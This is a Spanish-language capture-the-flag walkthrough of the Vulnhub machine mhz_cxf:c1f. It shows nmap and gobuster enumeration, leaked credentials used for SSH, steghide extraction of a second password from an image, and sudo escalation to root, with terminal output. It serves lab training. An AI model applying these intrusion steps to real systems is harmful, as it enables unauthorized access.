[VLN] mhz_cxf:c1f

Hoy vamos a hackear la maquina de Vulnhub llamada mhz_cxf: c1f. Podeis descargarla desde el siguiente enlace: https://www.vulnhub.com/entry/mhz_cxf-c1f,471/
  • Enumeration
  • Empezamos con un nmap para ver que puertos tiene abiertos.
    sml@Cassandra:~$ nmap -A -p- Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-02 10:51 CEST Nmap scan report for mhz_c1f.home ( Host is up (0.00045s latency). Not shown: 65533 closed ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 38:d9:3f:98:15:9a:cc:3e:7a:44:8d:f9:4d:78:fe:2c (RSA) | 256 89:4e:38:77:78:a4:c3:6d:dc:39:c4:00:f8:a5:67:ed (ECDSA) |_ 256 7c:15:b9:18:fc:5c:75:aa:30:96:15:46:08:a9:83:fb (ED25519) 80/tcp open http Apache httpd 2.4.29 ((Ubuntu)) |_http-server-header: Apache/2.4.29 (Ubuntu) |_http-title: 400 Bad Request Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 17.67 seconds
    Miramos si encontramos algo interesante en el Apache usando gobuster.
    sml@Cassandra:~$ gobuster dir -u -w /usr/share/wordlists/dirb/big.txt -x php,txt =============================================================== Gobuster v3.0.1 by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_) =============================================================== [+] Url: [+] Threads: 10 [+] Wordlist: /usr/share/wordlists/dirb/big.txt [+] Status codes: 200,204,301,302,307,401,403 [+] User Agent: gobuster/3.0.1 [+] Extensions: php,txt [+] Timeout: 10s =============================================================== 2020/05/02 10:52:31 Starting gobuster =============================================================== /.htaccess (Status: 403) /.htaccess.php (Status: 403) /.htaccess.txt (Status: 403) /.htpasswd (Status: 403) /.htpasswd.txt (Status: 403) /.htpasswd.php (Status: 403) /notes.txt (Status: 200) /server-status (Status: 403) =============================================================== 2020/05/02 10:52:41 Finished ===============================================================
    Vemos que hay un fichero llamado notes.txt asi que vamos a verlo: El contenido es: 1- i should finish my second lab 2- i should delete the remb.txt file and remb2.txt Asi que visitamos El contenido es: first_stage:flagitifyoucan1234
  • Low Shell
  • Usamos los credenciales que hemos obtenido en el fichero remb.txt para loguearnos por ssh.
    sml@Cassandra:~$ ssh first_stage@ first_stage@'s password: Welcome to Ubuntu 18.04.4 LTS (GNU/Linux 4.15.0-96-generic x86_64) * Documentation: https://help.ubuntu.com * Management: https://landscape.canonical.com * Support: https://ubuntu.com/advantage System information as of Sat May 2 08:54:06 UTC 2020 System load: 0.28 Processes: 97 Usage of /: 45.1% of 9.78GB Users logged in: 0 Memory usage: 20% IP address for enp0s3: Swap usage: 0% 28 packages can be updated. 0 updates are security updates. *** System restart required *** Last login: Fri Apr 24 18:18:07 2020 from $
  • user.txt
  • first_stage@mhz_c1f:~$ pwd /home/first_stage first_stage@mhz_c1f:~$ ls user.txt first_stage@mhz_c1f:~$ cat user.txt HEEEEEY , you did it that's amazing , good job man so just keep it up and get the root bcz i hate low privileges ;) #mhz_cyber
  • Post Exploitation
  • Despues de mirar el sistema, hay una carpeta llamada Painting que puede que contenga informacion oculta, asi que la transfiero a mi maquina para ver si con steghide sale algo...
    first_stage@mhz_c1f:~$ cd /home/mhz_c1f first_stage@mhz_c1f:/home/mhz_c1f$ scp -r Paintings/ sml@ sml@'s password: Russian beauty.jpeg 100% 507KB 44.4MB/s 00:00 19th century American.jpeg 100% 437KB 42.1MB/s 00:00 spinning the wool.jpeg 100% 905KB 61.7MB/s 00:00 Frank McCarthy.jpeg 100% 348KB 52.8MB/s 00:00 sml@Cassandra:~/vulnhub/mhz/Paintings$ steghide extract -sf spinning\ the\ wool.jpeg Anotar salvoconducto: anot� los datos extra�dos e/"remb2.txt". sml@Cassandra:~/vulnhub/mhz/Paintings$ cat remb2.txt ooh , i know should delete this , but i cant' remember it screw me mhz_c1f:1@ec1f
    Vemos que hemos podido sacar el fichero remb2.txt del fichero spinning the wool.jpg (el password esta vacio), el cual nos da los credenciales de mhz_c1f.
  • Privilege Escalation
  • first_stage@mhz_c1f:/home/mhz_c1f$ su mhz_c1f Password: mhz_c1f@mhz_c1f:~$ sudo -l [sudo] password for mhz_c1f: Matching Defaults entries for mhz_c1f on mhz_c1f: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/ snap/bin User mhz_c1f may run the following commands on mhz_c1f: (ALL : ALL) ALL mhz_c1f@mhz_c1f:~$ sudo su root@mhz_c1f:/home/mhz_c1f#
  • root.txt
  • Por ultimo, miramos la flag de root.
    root@mhz_c1f:~# cat .root.txt OwO HACKER MAN :D Well done sir , you have successfully got the root flag. I hope you enjoyed in this mission. #mhz_cyber
  • End
  • Y con esto ya seriamos root de la maquina :)